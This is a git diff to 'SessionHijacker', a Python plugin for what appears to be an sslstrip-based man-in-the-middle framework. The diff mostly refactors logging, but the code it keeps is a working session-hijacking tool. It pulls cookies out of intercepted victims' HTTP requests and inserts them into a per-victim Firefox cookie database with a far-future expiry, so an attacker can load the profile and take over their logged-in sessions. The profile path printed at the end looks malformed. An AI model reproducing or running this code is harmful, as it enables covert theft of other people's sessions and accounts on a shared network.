diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py index ae87080..ea93ab4 100644 --- a/plugins/SessionHijacker.py +++ b/plugins/SessionHijacker.py @@ -1,8 +1,6 @@ -#Almost all of the Firefox related code was stolen from Glenn's Firelamb. -#glenn@sensepost.com - +#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb + from plugins.plugin import Plugin -from sslstrip.URLMonitor import URLMonitor from libs.publicsuffix import PublicSuffixList from urlparse import urlparse import os @@ -10,7 +8,6 @@ import sys import time import logging import sqlite3 -import threading class SessionHijacker(Plugin): name = "Session Hijacker" @@ -22,8 +19,6 @@ class SessionHijacker(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options - self.log_clients = options.clients - self.urlMonitor = URLMonitor.getInstance() self.psl = PublicSuffixList() self.firefox = options.firefox self.save_dir = "./logs" @@ -50,22 +45,15 @@ class SessionHijacker(Plugin): client_ip = request.getClientIP() if 'cookie' in headers: - message = "%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']) - if self.urlMonitor.isClientLogging() is True: - self.urlMonitor.writeClientLog(request, headers, message) - if self.firefox: url = "http://" + headers['host'] + request.getPathFromUri() for cookie in headers['cookie'].split(';'): eq = cookie.find("=") cname = str(cookie)[0:eq].strip() cvalue = str(cookie)[eq+1:].strip() - #t = threading.Thread(name='firefoxdb', target=self.firefoxdb, args=(headers['host'], cname, cvalue, url, client_ip)) - #t.setDaemon(True) - #t.start() self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) else: - logging.info(message) + logging.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) #def handleHeader(self, request, key, value): # Server => Client @@ -122,6 +110,11 @@ class SessionHijacker(Plugin): expire_date = 2000000000 #Year2033 now = int(time.time()) - 600 self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) + logging.info("%s << Inserted cookie into firefox db" % ip) def add_options(self, options): options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') + + def finish(self): + if self.firefox: + print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file